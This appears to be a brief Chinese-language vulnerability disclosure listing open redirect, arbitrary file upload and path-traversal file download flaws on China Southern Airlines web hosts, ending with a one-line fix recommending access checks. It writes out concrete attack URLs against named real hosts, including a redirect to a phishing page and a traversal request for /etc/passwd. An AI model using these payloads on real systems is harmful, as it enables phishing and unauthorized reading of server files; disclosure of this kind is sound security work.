中国南方航空多个漏洞合集,文件上传,文件下载,URL跳转。
任意地址跳转:
http://big5.csair.com/SuniT/www.baidu.com/index.html
http://big5.csair.com/SuniT/fish.cccsair.com/钓鱼.html
任意文件上传:
http://olcs2.csair.com/upload.php已经上传不确定文件位置。
文件下载:
http://www.csair.com/en/tourguide/before_ready/destination/download/download.php?FileName=download.php
http://www.csair.com/en/tourguide/before_ready/destination/download/download.php?FileName=../../../../../../../../../../../../../../../../etc/passwd
修复方案:
都需要加入权限判断,不能直接访问。